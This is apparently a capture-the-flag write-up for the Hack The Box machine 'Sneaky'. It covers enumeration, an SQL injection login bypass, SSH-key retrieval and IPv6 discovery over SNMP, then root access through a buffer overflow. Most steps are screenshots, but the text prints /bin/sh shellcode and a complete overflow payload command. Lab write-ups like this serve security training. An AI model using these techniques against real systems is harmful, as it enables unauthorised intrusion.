# Sneaky

## Sneaky - 10.10.10.20

### Target Enumeration:

IP: 10.10.10.20

User: 9fe14f76222db23a770f20136751bdab

Root: See screenshot

### Ports / Services / Software Versions Running

80/tcp open  http Apache httpd 2.4.7 ((Ubuntu))

161/udp open  snmp SNMPv1 server; net-snmp SNMPv3 server (public)

### Vulnerability Exploited:

SQLi authentication bypass

Users ssh key stored on webserver.

### Privilege Escalation:

/usr/local/bin/chal is vulnerable to a buffer overflow

### Exploiting the host:

Nmap

![](https://lh6.googleusercontent.com/i8qPkOI8tRyXiCH8SEBrcmGlEAm9jGchK1S8PKRKDkRaHBSyHkvhKcEyAz69C4odFsLY_VUb6v74j75t1KQ9aRlq4UhyTvlGvqNQmuC_VB2kdyibOL3kqAty9yGKocHnP9BXIvl1)

Dirb:

<div align="left"><img src="https://lh4.googleusercontent.com/AJqex9vaoOyFd-_4nbKW7MiYhkSi-KC0VWyqYPfjSaISAfemLuXLIvn_he1Tm6JcA2n4AEiAgRM3wanowvxSsGQB3cVseXRu5KphY2bwQ8QWKWSm18u_C0x9BOHhouCDaAsEaGHc" alt=""></div>

/dev is a login page

<div align="left"><img src="https://lh4.googleusercontent.com/HFw7YSRkTm3CipYmmWSkD5uLLO2H6wwDspY3PbTcCJvy7mUqIJKe5SYfDQPAbn8VzB6_CZyzn-HLoxDXSXVThRawvX2lWheAVZ_cZPgHO-cD5L5-zWg0v4dKCzdTN3DxFrrh5Bt8" alt=""></div>

Intercept login request and fuzz for sql with burp intruder:

![](https://lh3.googleusercontent.com/_sMikqLi8oCm7x1XRoTLFEFU52b0yHAA8mBUznRZ2YwNE6EE2h3UZAvtyDyzNQo_JwTPHGC7YdkNhDeKjrccKPaFnR_tqDU3_rpv0m1C1W5HngGJ9w3GS24haE28lYXtmvvinYor)

You can bypass the login with an sqli payload

<div align="left"><img src="https://lh3.googleusercontent.com/fgfdqlSaNwWyGjEWK_TvWVywTlh0v6qv5bexDxpxnRxhLLYy7Tb_X37EK8qQqtHq8j3QCec6abSrKn3zQ5SPg8oto-zM8_pjuKIHpibsWtS5IsRNN_Ka0vHtzIHe78r2ER_G25JH" alt=""></div>

Request in browser and download the key

<div align="left"><img src="https://lh5.googleusercontent.com/713Ce8xaK_V__xrlpivTO_Tuj-z0_YjsMbuwmDK2FM4WicqNTva2dlKnzl0l6T1iUZu0fRBvD35jYwFkCKFY9Mi6yUUlbV5cuIcUhTRzY5jNHEKVtFWpku0zc4pJnP3kkEiRBiSv" alt=""></div>

Key contents

<div align="left"><img src="https://lh4.googleusercontent.com/VG_612Ol081hzE0ANMs4wa8DqBQ63d8f8lhpGLJ1qbWRb_OWS7tPO1nkDts_sHUyyWbgMoMNl-hTosruuhlKN5ZsAMd_V2y1zrGElZdYYeJHFHa0CBDVzOwxf-1VTOnHDZVVH2BL" alt=""></div>

There is no ssh port open so need to find the IPv6 address.

Check our IPv6 address

Snmpwalk pubic string gives lots of information:

![](https://lh4.googleusercontent.com/nCKdkk9-zNmw01y4dm-gAyQZhPn1O1phhpvTexZ4jpfDK7rrUTE-yCkgjsqAZ6p-wM-ReU3QdBbNfvnM6ZM6vBlj29ll8LlsH1gIDaDKjStdluqgdqr_nqPlqe8dhJDPp8wnz2Tn)

Find the IPv6 info

![](https://lh4.googleusercontent.com/sXfNg4BeIxnm8soaP1z1MZg_pTmWwJBvTRQ6zyfYWAYYDKGUW9KEAa3MqPakRJdbOO4rLFzuifwJrQ5t9nvCkA6dNhbENPIXsNHzqBt8Eyd5FukG9ZQXF9yDmpqfR14BGYA8v8hB)

Convert from decimal to hex

iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

Convert to hex with python:

<div align="left"><img src="https://lh4.googleusercontent.com/XQPtbvf8roejk8vFw3D-U-0q6Vcb_3kCR90o_yvJlTp6-VLRDHww_1UxS8I1-vA-aR9sOHySK8ytx1FoblrsQ7dfNlxqojrrZWnFGv78s1yX26U-YwYQAUL7C6imgyyi3USaF9YV" alt=""></div>

Build the address based on the same format

`Dead:beef::250:56ff:feb2:8ef8`

Login with ssh -6 username and key

![](https://lh5.googleusercontent.com/V39NTS1tgMyOMiEYJhG3cma8lKBYoDGhIRYd-a0brXy36b2oZ3LN7hpUO7D1IgkgidFVN_Ax_KgKDnxGLznKNr83KzpB2IjyeAkBRTxgTUy9kpwFT6PLe13HqPOn_hg9QIWrzizl)

Search for privesc

![](https://lh4.googleusercontent.com/CtzkIEBmtSiRxQV9lqHnSO0lsyrcIyh8wEuifE4DvIcG575rjof9wq8BRK-sbkWrfyjtswg4RDVPWsXLb4qLU5V7-E2ocaHDWnAxEh2nOP63xhEo9CQ18ilcatJJrwAmO1Ao_iMw)

Running the file shows it could be vulnerable to a buffer overflow

<div align="left"><img src="https://lh4.googleusercontent.com/lAw3ZnKCYcqMT7q3tdnfDTWxUlLYK_hMi3EOZXURdNZKynhGvja5uKhRD46_UxWpxonBEUNx-wWWt4j_qBS6MHL8XO5I3ZbhLs2g3xA5Tz0Av4hIkmneTlTZnPWP_77BrJARebh_" alt=""></div>

Check you can overwrite:

![](https://lh4.googleusercontent.com/0aFs6eDsC4wKWxrzSA_ih6Oj9joM_zktkGO4sF12o9h0TwWX5pVLQTDR7pv_kkJ0Sm43SOfFvveKjBRRWTaKL_-3Vj-eYSYAIfXPSLa1pexZHMvpV8e8oAYgPstlQuOq7-B1c2iN)

Generate a pattern to locate offset

![](https://lh3.googleusercontent.com/IR4QPZYwpLc_AyAqaGzDFb-0Kzj2kdHtPaS-iCPGw6Nni09zGBaAWHe0-R9h5RHgdb5-c1gciuIJRbsPTprCOgfO9Gn8aVinRJhsnRESON8ysdFb6CPEGmXbCJLjDzopEZ5KAg2x)

Dump that into the program

<div align="left"><img src="https://lh4.googleusercontent.com/0O-O9xkfFbBcevvDITQJFAL9LybvqGiHQ4cDYCbsHOB2MI7l-Sc1Gevxs7-iAz0HuiWyYUdKMtLIqNKVMfUjbGusprLtJY1A40yRHu-_a55anJvwwsBNBU3IBZJfs3HjtcDdg_y6" alt=""></div>

Query the offset

![](https://lh3.googleusercontent.com/5jijNmo8LZ73XXhlMl7Nywf2-z-P1QcXHAEucQgfkJ77fPtsoIgL1FdC1bkYbIq6V1mpJEKSNc_Z1F8FzH8eOkCexBcyfXv7Q6Gn1xkmJfTqciLZF-D8dYWWnrQOIdVGMH_zfZCb)

Found the offset

![](https://lh6.googleusercontent.com/7op9KCgUaXkjaORWM8pHpP3OPH508SUZyeC1B4tr_lxx7FG5Y9GOeBUNnEuklV1NLE4SDMHXKuafKmkb1vUTQG1I7b5vqpBB8jBiqfC0XkwQyqmVvwny3NJQjOeu5mEpOe45Oe2s)

Build the overflow using /bin/sh as shellcode

```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```

You will need to try various memory addresses to get this to exploit:

Open gdb and find the memory addresses:

(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA

![](https://lh3.googleusercontent.com/Erz_6cbXeqbdU6VVKDaB8RzEm5tpVQ7dVI1h5RUxXGPnjvjtPY5tgt78IRRznvp0BR3JmBlgizkN2-kPUIOA_Egd1vjmv3r0pbDgJ2QphvpUvInEg7aeloxNbpSHAgTE3ukqKOsM)

Convert address to little endian

Build your payload as follows:

```
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
```

![](https://lh4.googleusercontent.com/-f7K2wlXknEa5ePcu4milvEZ0-vFzNTsloWhNJInqJgcevTHIBw6D5E00WKv-oa2wT0JAaXqpSZP9DKipqOOLn0-P4tua4CyNWHNuNb9gDJMRgt0Yyrm8327AW7AApXddfq7lBSE)

Now you have a root shell so collect the flags

<div align="left"><img src="https://lh3.googleusercontent.com/jyltSt5nFD9jUnVM5PaoXlGvhhqMElcfif2fuoVv2NxOKlPGy9PAcuHtpHlMgYRGHtHPotGvdb7wbZrGqstlfHpAsgArzM-ujgSEwGd3Np8vLl9yolEuCR4ytEe3w-eoo_XCe5dt" alt=""></div>